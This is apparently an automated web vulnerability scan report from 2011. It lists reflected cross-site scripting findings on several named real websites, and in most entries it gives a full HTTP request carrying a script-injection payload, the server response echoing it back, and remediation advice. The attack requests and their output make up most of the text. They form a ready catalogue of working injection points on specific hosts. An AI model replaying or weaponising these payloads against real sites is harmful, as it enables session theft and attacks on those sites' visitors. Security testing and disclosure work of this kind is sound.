Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error1014d"%3balert(1)//21a83927387&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:44 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n19), ms iad-agg-n19 ( sfo-agg-n1), ms sfo-agg-n1 ( origin>CONN) Cache-Control: max-age=7200 Expires: Thu, 03 Feb 2011 20:54:45 GMT Age: 0 Content-Type: text/html Vary: Accept-Encoding Connection: keep-alive Content-Length: 28742
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... rn new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the domain request parameter is copied into a JavaScript inline comment. The payload d8ddc*/alert(1)//26af18f6098 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.comd8ddc*/alert(1)//26af18f6098&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:41 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n28), ms sfo-agg-n28 ( origin>CONN) Cache-Control: max-age=7200 Expires: Thu, 03 Feb 2011 20:54:41 GMT Age: 0 Content-Type: text/html Vary: Accept-Encoding Connection: keep-alive Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
/** referer=http://mortgage.ocregister.com/feeda71cd%22%3e%3cscript%3ealert(1)%3c/script%3e1f35e8c0ea2/ **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t() ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9298"%3balert(1)//3579af22c1e was submitted in the domain parameter. This input was echoed as e9298";alert(1)//3579af22c1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.come9298"%3balert(1)//3579af22c1e&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogs HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:40 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n34), ms sfo-agg-n34 ( origin) Cache-Control: max-age=7200 Expires: Thu, 03 Feb 2011 20:54:40 GMT Age: 0 Content-Type: text/html Vary: Accept-Encoding Connection: keep-alive Content-Length: 28807
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
...[SNIP]... <0){eval(c);return new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
The value of the ghier request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aca8c"%3b4150865a2c4 was submitted in the ghier parameter. This input was echoed as aca8c";4150865a2c4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=ocregister&domain=mortgage.freedomblogging.com&ctype=error&cname=&shier=business|realestate|blogs|mortgage&ghier=blogsaca8c"%3b4150865a2c4 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:55:05 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n7), ms sfo-agg-n7 ( origin>CONN) Cache-Control: max-age=7200 Expires: Thu, 03 Feb 2011 20:55:05 GMT Age: 0 Content-Type: text/html Vary: Accept-Encoding Connection: keep-alive Content-Length: 28761
var fiChildSAccount="fiocregister";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */
The value of the css request parameter is copied into the HTML document as plain text between tags. The payload 2441a<script>alert(1)</script>3c82a873a6e was submitted in the css parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site2441a<script>alert(1)</script>3c82a873a6e&scode=ocregister HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:29 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n6), ms iad-agg-n6 ( sfo-agg-n45), ms sfo-agg-n45 ( origin) ETag: "f4f38c4aee23a73f09d77826215df995-80952" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:29 GMT Age: 0 Content-Type: text/css Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:29 GMT Connection: keep-alive Content-Length: 80952
The value of the js request parameter is copied into the HTML document as plain text between tags. The payload 56f76<script>alert(1)</script>f1eb6477288 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?js=56f76<script>alert(1)</script>f1eb6477288&scode=ocregister HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:25 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n5), ms iad-agg-n5 ( sfo-agg-n40), ms sfo-agg-n40 ( origin) ETag: "f9bfbcc84f8fc00f069b546540ef24b0-119" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:25 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:25 GMT Connection: keep-alive Content-Length: 119
The value of the js request parameter is copied into a JavaScript inline comment. The payload c4d58*/alert(1)//cadae76dd14 was submitted in the js parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:26 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n36), ms sfo-agg-n36 ( origin) ETag: "921c1eecd508a1cdcf54fe736b0295a6-275310" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:26 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:26 GMT Connection: keep-alive Content-Length: 275310
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_navc4d58*/alert(1)//cadae76dd14&scode=ocregister */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License
...[SNIP]...
1.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c442d<script>alert(1)</script>e464d1587a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister&c442d<script>alert(1)</script>e464d1587a7=1 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:51 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n28), ms iad-agg-n28 ( sfo-agg-n44), ms sfo-agg-n44 ( origin) ETag: "9619eb07dd52d1bb379fc8198f8514d7-86888" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:52 GMT Age: 3 Content-Type: text/css Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:55 GMT Connection: keep-alive Content-Length: 86888
/* Reset styles for browser compatibility */ body, th, td, p, div { font-family:Arial, Helvetica, sans-serif; } html,ul,ol,li,h1,h2,h3,h4,h5,h6, pre ...[SNIP]...
1.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://common.onset.freedom.com
Path:
/tools/load.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload e7e46*/alert(1)//5ca6254cbb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:45 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n25), ms iad-agg-n25 ( sfo-agg-n22), ms sfo-agg-n22 ( origin>CONN) ETag: "36d7fe9bef85681434af3bae951e1aa9-277034" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:46 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:45 GMT Connection: keep-alive Content-Length: 277034
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister&e7e46*/alert(1)//5ca6254cbb1=1 */ /* * jQuery JavaScript Library v1.3.2 * http://jquery.com/ * * Copyright (c) 2009 John Resig * Dual licensed under the MIT and GPL licenses. * http://docs.jquery.com/License * * Date: 200 ...[SNIP]...
The value of the scode request parameter is copied into the HTML document as plain text between tags. The payload 3df07<script>alert(1)</script>35144f36647 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:37 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n3), ms iad-agg-n3 ( sfo-agg-n14), ms sfo-agg-n14 ( origin) ETag: "2ca22c76c464a94c8b23b21959b5333c-22441" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:37 GMT Age: 0 Content-Type: text/css Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:37 GMT Connection: keep-alive Content-Length: 22441
/* http://common.cdn.onset.freedom.com/tools/load.php?css=style,jquery.jcarousel,site&scode=ocregister3df07<script>alert(1)</script>35144f36647 */ /*generic freedom site styles, take layout.css styles and define fonts, background images, etc */
/* define page areas */ body { font-family: Arial, Helvetica, sans-serif; font-size: 100%; ...[SNIP]...
The value of the scode request parameter is copied into a JavaScript inline comment. The payload 4af35*/alert(1)//4781d05c682 was submitted in the scode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 HTTP/1.1 Host: common.onset.freedom.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:54:31 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n36 ( iad-agg-n18), ms iad-agg-n18 ( sfo-agg-n52), ms sfo-agg-n52 ( origin) ETag: "c2f050b674a3c750a989f83312ba3a06-4132" Cache-Control: max-age=86400 Expires: Fri, 04 Feb 2011 18:54:31 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 18:54:31 GMT Connection: keep-alive Content-Length: 4132
/* http://common.cdn.onset.freedom.com/tools/load.php?js=jquery-1.3.2.min,jquery-ui-1.7.1.custom.min,jquery.ifixpng,jqModal,jquery.jcarousel.pack,jquery.cookie,jquery.base64,global.ui,ocr_com_nav&scode=ocregister4af35*/alert(1)//4781d05c682 */ /* * jQuery ifixpng plugin * (previously known as pngfix) * Version 2.1 (23/04/2008) * @requires jQuery v1.1.3 or above * * Examples at: http://jquery.khurshid.com * Copyright (c) 20 ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fc1bd<script>alert(1)</script>f099d0b47bf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.completedfc1bd<script>alert(1)</script>f099d0b47bf HTTP/1.1 Host: da.newstogram.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
1.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://da.newstogram.com
Path:
/hg.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1a69a<script>alert(1)</script>840e96d1dd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hg.php?uid=B46354F1-787D-4611-AE0D-C5EFA6EF634B&k=e58aac080a2606121e77aba437a3165d&s=http%3A//mortgage.ocregister.com/feeda71cd%2522%253E%253Cscript%253Ealert%281%29%253C/script%253E1f35e8c0ea2/&r=http%3A//burp/show/49&q=0&e=2&cid=&callback=Newstogram.compl/1a69a<script>alert(1)</script>840e96d1dd4eted HTTP/1.1 Host: da.newstogram.com Proxy-Connection: keep-alive Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(1)%3C/script%3E1f35e8c0ea2/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1105555422-1296072885434; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3%27
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b337"><script>alert(1)</script>ef6b6cded06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays6b337"><script>alert(1)</script>ef6b6cded06/DDFY10Pennsylvania?pg=entry&fr_id=26972 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b20"><script>alert(1)</script>f315c83fe6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<title>The American Cancer Society: </title> <meta http-equiv="Co ...[SNIP]... <form name="TrEventSearchForm" id="TrEventSearchForm" action="http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania20b20"><script>alert(1)</script>f315c83fe6a?pg=entry&fr_id=26972" method="post"> ...[SNIP]...
1.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://daffodil.acsevents.org
Path:
/site/TR/DaffodilDays/DDFY10Pennsylvania
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab6ab"><script>alert(1)</script>a53cb358e62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/TR/DaffodilDays/DDFY10Pennsylvania?pg=entry&fr_id=26972&ab6ab"><script>alert(1)</script>a53cb358e62=1 HTTP/1.1 Host: daffodil.acsevents.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 59e02<script>alert(1)</script>41e145e4da2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/mapserver.superpages.com/p.json?callback=_ate.ad.hpr59e02<script>alert(1)</script>41e145e4da2&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fmapserver.superpages.com%2Fmapbasedsearch%2F%3F%26SRC%3Dcomlocal1a%26C%3Dbanks415ee%2522%253balert(1)%2F%2F7f39f412a8d%26L%3D19101%26CS%3DL%26MCBP%3Dtrue%26C%3DBanks%26STYPE%3DS%26PS%3D15%26search%3DFind%2BIt&ref=http%3A%2F%2Fburp%2Fshow%2F52&wzilxl HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296659685.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 463 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 03 Feb 2011 18:54:36 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 05 Mar 2011 18:54:36 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296759276.60|1296659685.66; Domain=.addthis.com; Expires=Sat, 02-Feb-2013 14:10:54 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Thu, 03 Feb 2011 18:54:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 18:54:37 GMT Connection: close
The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6ebd"><script>alert(1)</script>7daaa4423aa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?keyword=f6ebd"><script>alert(1)</script>7daaa4423aa HTTP/1.1 Host: easycheckingbanking.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
1.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://easycheckingbanking.com
Path:
/
Issue detail
